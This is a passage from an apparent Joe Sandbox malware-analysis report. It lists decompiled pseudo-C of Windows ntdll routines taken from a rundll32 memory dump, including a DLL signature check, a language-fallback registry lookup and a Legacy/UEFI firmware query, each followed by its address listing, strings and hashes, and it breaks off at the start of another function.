                                                                                            0x045e88d7
                                                                                            0x045e88db
                                                                                            0x045e88dc
                                                                                            0x045e88e0
                                                                                            0x045e88e8
                                                                                            0x045e88ee
                                                                                            0x045e88f0
                                                                                            0x045e88f3
                                                                                            0x045e88fc
                                                                                            0x045e8901
                                                                                            0x045e8906
                                                                                            0x045e890c
                                                                                            0x045e890c
                                                                                            0x045e890f
                                                                                            0x045e8916
                                                                                            0x045e8917
                                                                                            0x045e8918
                                                                                            0x045e8919
                                                                                            0x045e891a
                                                                                            0x045e891f
                                                                                            0x045e8921
                                                                                            0x04639c52
                                                                                            0x04639c55
                                                                                            0x04639c5b
                                                                                            0x04639cac
                                                                                            0x04639cc0
                                                                                            0x04639cc0
                                                                                            0x04639c55
                                                                                            0x045e8927
                                                                                            0x045e8927
                                                                                            0x045e892f
                                                                                            0x045e8933
                                                                                            0x00000000
                                                                                            0x045e88f5
                                                                                            0x045e88f5
                                                                                            0x00000000
                                                                                            0x045e88f7
                                                                                            0x045e88f7
                                                                                            0x045e88fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e88fa
                                                                                            0x045e88f5
                                                                                            0x045e88f3
                                                                                            0x00000000
                                                                                            0x045e88d5
                                                                                            0x00000000
                                                                                            0x045e88b2
                                                                                            0x045e88c9
                                                                                            0x00000000
                                                                                            0x045e88c9
                                                                                            0x045e887f
                                                                                            0x045e886a
                                                                                            0x045e8857
                                                                                            0x045e8852
                                                                                            0x045e88bf
                                                                                            0x045e88bf
                                                                                            0x045e87aa
                                                                                            0x045e87ad
                                                                                            0x045e87ae
                                                                                            0x045e87b4
                                                                                            0x045e87b5
                                                                                            0x045e87b6
                                                                                            0x045e87b8
                                                                                            0x045e87bd
                                                                                            0x045e87c1
                                                                                            0x045e87f4
                                                                                            0x045e87fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e87c1
                                                                                            0x00000000

                                                                                            Strings
                                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04639C18
                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 04639C28
                                                                                            • LdrpDoPostSnapWork, xrefs: 04639C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                            • API String ID: 0-1948996284
                                                                                            • Opcode ID: 1b153dcd96394859b1f97b33b81d4f23f79adfecd735b252ce25313b0e39e320
                                                                                            • Instruction ID: 76e092cb26888de5b5329b2435e6f069e59c0fe656fb0bad1f3e8f150d1786e9
                                                                                            • Opcode Fuzzy Hash: 1b153dcd96394859b1f97b33b81d4f23f79adfecd735b252ce25313b0e39e320
                                                                                            • Instruction Fuzzy Hash: E09104B1A00216AFDF1CEF5AD8819BA73B5FF44344B184469DD05AB250EB70FD06EB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045E7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E045E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E045ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E045DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x46c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04655510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x46c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E045F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E045F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04657016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E045F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E045F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04657016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0460A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E045DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                            0x045e7e4c
                                                                                            0x045e7e50
                                                                                            0x045e7e55
                                                                                            0x045e7e58
                                                                                            0x045e7e5d
                                                                                            0x045e7e71
                                                                                            0x045e7f33
                                                                                            0x045e7e77
                                                                                            0x045e7e77
                                                                                            0x045e7e79
                                                                                            0x045e7e79
                                                                                            0x045e7e7e
                                                                                            0x045e7f45
                                                                                            0x04639848
                                                                                            0x00000000
                                                                                            0x04639848
                                                                                            0x045e7f4e
                                                                                            0x045e7f53
                                                                                            0x045e7f5a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463985a
                                                                                            0x04639862
                                                                                            0x04639866
                                                                                            0x00000000
                                                                                            0x0463986c
                                                                                            0x00000000
                                                                                            0x0463986c
                                                                                            0x045e7e84
                                                                                            0x045e7e84
                                                                                            0x045e7e8d
                                                                                            0x04639871
                                                                                            0x045e7eb8
                                                                                            0x045e7ec0
                                                                                            0x045e7ec0
                                                                                            0x045e7e9a
                                                                                            0x0463987e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04639884
                                                                                            0x0463988b
                                                                                            0x046398a7
                                                                                            0x046398ac
                                                                                            0x046398b1
                                                                                            0x046398b6
                                                                                            0x046398b8
                                                                                            0x046398b8
                                                                                            0x046398b9
                                                                                            0x00000000
                                                                                            0x046398b9
                                                                                            0x045e7ea0
                                                                                            0x045e7ea7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e7eac
                                                                                            0x045e7eb1
                                                                                            0x045e7ec6
                                                                                            0x045e7ed0
                                                                                            0x046398cc
                                                                                            0x045e7ed6
                                                                                            0x045e7ed6
                                                                                            0x045e7ed6
                                                                                            0x045e7ede
                                                                                            0x045e7ee3
                                                                                            0x046398e3
                                                                                            0x046398f0
                                                                                            0x04639902
                                                                                            0x046398f2
                                                                                            0x046398fb
                                                                                            0x046398fb
                                                                                            0x04639907
                                                                                            0x0463991d
                                                                                            0x0463991d
                                                                                            0x04639907
                                                                                            0x046398e3
                                                                                            0x045e7ef0
                                                                                            0x045e7f14
                                                                                            0x045e7f14
                                                                                            0x045e7f1e
                                                                                            0x04639946
                                                                                            0x045e7f24
                                                                                            0x045e7f24
                                                                                            0x045e7f24
                                                                                            0x045e7f2c
                                                                                            0x0463996a
                                                                                            0x04639975
                                                                                            0x04639975
                                                                                            0x0463997e
                                                                                            0x04639993
                                                                                            0x04639993
                                                                                            0x0463997e
                                                                                            0x00000000
                                                                                            0x045e7ef2
                                                                                            0x045e7efc
                                                                                            0x045e7f0a
                                                                                            0x045e7f0e
                                                                                            0x04639933
                                                                                            0x00000000
                                                                                            0x04639933
                                                                                            0x00000000
                                                                                            0x045e7f0e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045e7eb1

                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 046398A2
                                                                                            • LdrpCompleteMapModule, xrefs: 04639898
                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 04639891
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                            • API String ID: 0-1676968949
                                                                                            • Opcode ID: c62dd6ecc2a75ac5f14a8c0c0db8d7c0b000618de5de3e98e689ba309b193a79
                                                                                            • Instruction ID: d87828350a096f28f25577d0235778d95f7b1772a03dacbcb89e50f003f43f85
                                                                                            • Opcode Fuzzy Hash: c62dd6ecc2a75ac5f14a8c0c0db8d7c0b000618de5de3e98e689ba309b193a79
                                                                                            • Instruction Fuzzy Hash: 135100716007819BEB29CF69C844B7AB7E4FB48318F0409A9E8519B3E1E770FD04EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E045DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E045DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E046195D0();
						}
						if(_t78 != 0) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0461FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0461BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04619600();
					if(_t97 < 0) {
						goto L6;
					}
					E0461BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L045DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0461BB40(_t83, _t102 + 0x24, _t78);
								if(L045E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0461BB40(_t84, _t102 + 0x24, _t94);
									if(L045E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                            0x045de620
                                                                                            0x045de628
                                                                                            0x045de62f
                                                                                            0x045de631
                                                                                            0x045de635
                                                                                            0x045de637
                                                                                            0x045de63e
                                                                                            0x04635503
                                                                                            0x04635503
                                                                                            0x045de64c
                                                                                            0x045de64c
                                                                                            0x045de651
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045de661
                                                                                            0x045de665
                                                                                            0x0463542a
                                                                                            0x045de715
                                                                                            0x045de71a
                                                                                            0x045de71c
                                                                                            0x045de720
                                                                                            0x045de720
                                                                                            0x045de727
                                                                                            0x045de736
                                                                                            0x045de736
                                                                                            0x045de743
                                                                                            0x045de743
                                                                                            0x045de673
                                                                                            0x045de678
                                                                                            0x045de67d
                                                                                            0x045de682
                                                                                            0x045de685
                                                                                            0x045de692
                                                                                            0x045de69b
                                                                                            0x045de6a3
                                                                                            0x045de6ad
                                                                                            0x045de6b1
                                                                                            0x045de6b2
                                                                                            0x045de6bb
                                                                                            0x045de6bf
                                                                                            0x045de6c0
                                                                                            0x045de6c8
                                                                                            0x045de6cc
                                                                                            0x045de6d5
                                                                                            0x045de6d9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045de6e5
                                                                                            0x045de6ea
                                                                                            0x045de6f9
                                                                                            0x045de70b
                                                                                            0x045de70f
                                                                                            0x04635439
                                                                                            0x0463545e
                                                                                            0x0463545e
                                                                                            0x00000000
                                                                                            0x0463545e
                                                                                            0x0463543b
                                                                                            0x0463543e
                                                                                            0x04635440
                                                                                            0x04635445
                                                                                            0x04635472
                                                                                            0x04635475
                                                                                            0x0463548d
                                                                                            0x04635493
                                                                                            0x046354a9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046354ab
                                                                                            0x046354b4
                                                                                            0x046354bc
                                                                                            0x046354c8
                                                                                            0x046354de
                                                                                            0x046354fb
                                                                                            0x046354e0
                                                                                            0x046354e6
                                                                                            0x046354eb
                                                                                            0x046354eb
                                                                                            0x046354de
                                                                                            0x00000000
                                                                                            0x046354bc
                                                                                            0x04635477
                                                                                            0x0463547a
                                                                                            0x04635480
                                                                                            0x04635483
                                                                                            0x04635486
                                                                                            0x0463548b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463548b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04635447
                                                                                            0x04635447
                                                                                            0x04635447
                                                                                            0x04635447
                                                                                            0x0463544e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04635450
                                                                                            0x04635452
                                                                                            0x04635455
                                                                                            0x0463545a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463545c
                                                                                            0x0463546a
                                                                                            0x0463546d
                                                                                            0x0463546f
                                                                                            0x00000000
                                                                                            0x0463546f
                                                                                            0x045de70f

                                                                                            Strings
                                                                                            • InstallLanguageFallback, xrefs: 045DE6DB
                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 045DE68C
                                                                                            • @, xrefs: 045DE6C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                            • API String ID: 0-1757540487
                                                                                            • Opcode ID: 8bfde9b06c39fda9f9fffc5994eb7f8fcfceb385329958236895eb717566704e
                                                                                            • Instruction ID: a93bc42f4ec1e6c164601606a562cdb5f0e211629c9512982158cafad52fa58d
                                                                                            • Opcode Fuzzy Hash: 8bfde9b06c39fda9f9fffc5994eb7f8fcfceb385329958236895eb717566704e
                                                                                            • Instruction Fuzzy Hash: 3C519172505395ABD724DF24C440A6BB3E8BF98719F05092EF986D7250FB34F904D7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046551BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E046551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x46b05f0);
				E0462D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E046553CA(0);
						return E0462D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0461F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E045F3690(1, _t117, 0x45b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0461AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L045F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0461AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0465500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04619860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                            0x046551be
                                                                                            0x046551c3
                                                                                            0x046551c8
                                                                                            0x046551cd
                                                                                            0x046551d0
                                                                                            0x046551d3
                                                                                            0x046551d8
                                                                                            0x046551db
                                                                                            0x046551de
                                                                                            0x046551e0
                                                                                            0x046551e3
                                                                                            0x046551e6
                                                                                            0x046551e8
                                                                                            0x04655342
                                                                                            0x04655351
                                                                                            0x04655356
                                                                                            0x0465535a
                                                                                            0x04655360
                                                                                            0x04655363
                                                                                            0x04655366
                                                                                            0x04655369
                                                                                            0x04655369
                                                                                            0x0465536b
                                                                                            0x0465536b
                                                                                            0x04655370
                                                                                            0x046553a3
                                                                                            0x046553a4
                                                                                            0x046553a6
                                                                                            0x046553ab
                                                                                            0x046553ab
                                                                                            0x046553ae
                                                                                            0x046553ae
                                                                                            0x046553b5
                                                                                            0x046553bf
                                                                                            0x046553bf
                                                                                            0x04655375
                                                                                            0x04655396
                                                                                            0x046553a0
                                                                                            0x046553a0
                                                                                            0x00000000
                                                                                            0x04655396
                                                                                            0x04655377
                                                                                            0x04655379
                                                                                            0x0465537f
                                                                                            0x0465538c
                                                                                            0x04655390
                                                                                            0x00000000
                                                                                            0x04655390
                                                                                            0x046551ee
                                                                                            0x046551f1
                                                                                            0x04655301
                                                                                            0x04655310
                                                                                            0x04655315
                                                                                            0x04655318
                                                                                            0x0465531b
                                                                                            0x04655320
                                                                                            0x0465532e
                                                                                            0x04655331
                                                                                            0x00000000
                                                                                            0x04655331
                                                                                            0x04655328
                                                                                            0x04655329
                                                                                            0x00000000
                                                                                            0x04655329
                                                                                            0x046551fa
                                                                                            0x04655235
                                                                                            0x04655236
                                                                                            0x04655239
                                                                                            0x0465523f
                                                                                            0x04655240
                                                                                            0x04655241
                                                                                            0x04655242
                                                                                            0x04655246
                                                                                            0x04655247
                                                                                            0x0465524e
                                                                                            0x04655251
                                                                                            0x04655267
                                                                                            0x04655269
                                                                                            0x0465526e
                                                                                            0x0465527d
                                                                                            0x0465527e
                                                                                            0x04655281
                                                                                            0x04655282
                                                                                            0x04655287
                                                                                            0x04655288
                                                                                            0x0465528a
                                                                                            0x0465528f
                                                                                            0x04655294
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0465529a
                                                                                            0x0465529c
                                                                                            0x0465529e
                                                                                            0x0465529e
                                                                                            0x046552a4
                                                                                            0x046552b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046552ba
                                                                                            0x046552bc
                                                                                            0x046552bc
                                                                                            0x046552d4
                                                                                            0x046552d9
                                                                                            0x046552dc
                                                                                            0x046552e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046552e7
                                                                                            0x046552f4
                                                                                            0x00000000
                                                                                            0x046552f4
                                                                                            0x04655270
                                                                                            0x00000000
                                                                                            0x04655270
                                                                                            0x046551fc
                                                                                            0x046551fd
                                                                                            0x04655202
                                                                                            0x04655203
                                                                                            0x04655205
                                                                                            0x0465520a
                                                                                            0x0465520f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0465521b
                                                                                            0x04655226
                                                                                            0x0465522b
                                                                                            0x0465521d
                                                                                            0x0465521d
                                                                                            0x04655222
                                                                                            0x04655222
                                                                                            0x0465522d
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: Legacy$UEFI
                                                                                            • API String ID: 2994545307-634100481
                                                                                            • Opcode ID: aea2a97c4ac75e5d8964725f30670c9d93186842a055b14daa7e6b09de648271
                                                                                            • Instruction ID: 376523d66169112ecafbdb9fd4e9a0b3b6cfa30f41a95d0d731b7191e7ad265b
                                                                                            • Opcode Fuzzy Hash: aea2a97c4ac75e5d8964725f30670c9d93186842a055b14daa7e6b09de648271
                                                                                            • Instruction Fuzzy Hash: D0518F71E00709AFDB24DFA8C944AADBBF8FF48704F54402DE94AEB265F671A941CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045FB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E045FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
